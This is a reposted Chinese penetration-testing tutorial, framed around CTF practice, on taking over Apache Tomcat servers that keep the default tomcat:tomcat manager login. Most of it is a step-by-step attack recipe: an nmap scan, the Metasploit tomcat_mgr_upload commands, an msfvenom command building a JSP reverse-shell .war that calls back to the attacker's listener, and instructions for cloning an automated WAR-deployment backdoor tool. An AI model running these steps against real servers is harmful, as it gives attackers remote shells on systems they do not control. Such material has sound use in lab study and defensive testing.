设为首页 - 加入收藏 1818新闻网 (http://www.1818xinwen.com)- 国内知名站长资讯网站,提供最新最全的站长资讯,创业经验,网站建设等!
热搜: 区块 中国 发布 如何
当前位置: 首页 > bet36体育在线世杯投注 > 外闻 > 正文

攻击Tomcat的多种姿势

发布时间:2019-02-27 04:49 所属栏目:[外闻] 来源:嘶吼专业版
导读:大家好,本文我想分享一下我的经验,如果你的Tomcat应用设置的是默认登陆凭证时(Tomcat:Tomcat)如何进行利用?当我在打CTF时,很多次我都发现目标主机上的Tomcat应用都是配置的默认登陆凭证,这有助于我们拿到主机的远程shell。因此,我感觉应该记录一下所

大家好,本文我想分享一下我的经验,如果你的Tomcat应用设置的是默认登陆凭证时(Tomcat:Tomcat)如何进行利用?当我在打CTF时,很多次我都发现目标主机上的Tomcat应用都是配置的默认登陆凭证,这有助于我们拿到主机的远程shell。因此,我感觉应该记录一下所有攻击Tomcat应用并获取远程主机webshell的方法。

目录

  • Tomcat经过身份验证的上传代码执行
  • 生成.war格式的后门
  • Tomcat war部署脚本
  • 生成JSP webshell

首先使用nmap进行扫描,看看8080端口是否运行着Tomcat服务

  1. nmap?-sV?-p8080?192.168.1.101?

攻击Tomcat的多种姿势

从扫描结果可以看到,8080端口是开放的,运行着Apache Tomcat。我们用浏览器来访问以下目标IP地址,后面带上端口号。我们可以看到一个HTTP身份认证页面来登陆Tomcat管理后台。

攻击Tomcat的多种姿势

Tomcat经过身份验证的上传代码执行

目标服务器是Apache Tomcat,而且泄露了管理后台,我们可以利用一个模块来执行payload。这个payload作为一个war文件上传,这个payload包含了一个jsp应用,该jsp应用使用POST方式向/manager/html/upload组件发起请求。请注意,根据目标主机的不同,这个payload的设置也会有所不同。比如,如果你的目标主机是Windows,那么你得使用原生的windows payload。

  1. use?exploit/multi/http/tomcat_mgr_upload?
  2. msf?exploit(multi/http/tomcat_mgr_upload)?>?set?rhost?192.168.1.101?
  3. msf?exploit(multi/http/tomcat_mgr_upload)?>?set?rport?8080?
  4. msf?exploit(multi/http/tomcat_mgr_upload)?>?set?httpusername?tomcat?
  5. msf?exploit(multi/http/tomcat_mgr_upload)?>?set?httppassword?tomcat?
  6. msf?exploit(multi/http/tomcat_mgr_upload)?>?exploit?

如图所示,我们可以看到我们已经拿下了目标主机的meterpreter会话:

攻击Tomcat的多种姿势

生成.war格式的后门

攻击Tomcat的多种姿势

我们可以使用msfvenom来为java和jsp payload生成一个.war格式的后门。你要做的就是按照下面提供的语法来创建一个.war格式的文件并启动nc进行监听:

  1. Syntax:?msfvenom?-p?[payload]?LHOST=[Kali?Linux?IP]?LPORT=[1234]?-f?[file?format]?>?[file?name]?
  2. msfvenom?-p?java/jsp_shell_reverse_tcp?LHOST=192.168.1.101?LPORT=1234?-f?war?>?shell.war?
  3. nc?-lvp?1234?

攻击Tomcat的多种姿势

现在,使用默认的登陆凭证Tomcat:tomcat登陆到Tomcat管理后台中,登陆成功后你就能看到管理员面板,在这里你可以上传.war文件。

如图所示,你可以看到我已经在截图中圈出了“浏览恶意的shell.war文件进行部署”。一旦你成功上传你的war文件,在应用表中,你可以看到一个跟你war文件名字相同的目录。

想要执行你的war文件,你需要进入该目录并点击war文件,或者是直接在URL里访问。

一旦你执行了war文件,你就可以通过nc获得一个反向连接。

攻击Tomcat的多种姿势

耶,我们又一次获得了一个远程主机的webshell。

攻击Tomcat的多种姿势

Tomcat War部署脚本

这是一个渗透测试工具,旨在利用Apache Tomcat凭证以自动生成和部署JSP后门,一旦之后触发这个后门,,就会返回一个令人大快人心的shell了(不管是通过web gui还是监听绑定到目标主机的端口或者是回连到攻击者的反向TCP payload)。

实际上,它会动态的生成JSP后门war包,然后使用pentester提供的有效的HTTP身份认证凭证(或者自定义凭证,一般都是Tomcat:tomcat)登陆到Tomcat管理界面中并且将其部署到Tomcat应用程序中。

部署脚本你可以在这里进行下载:

https://github.com/mgeeky/tomcatWarDeployer

  1. git?clone?https://github.com/mgeeky/tomcatWarDeployer?
  2. cd?tomcatWarDeployer?
  3. ls?

攻击Tomcat的多种姿势

【免责声明】本站内容转载自互联网,其相关言论仅代表作者个人观点绝非权威,不代表本站立场。如您发现内容存在版权问题,请提交相关链接至邮箱:bqsm@foxmail.com,我们将及时予以处理。

网友评论
推荐文章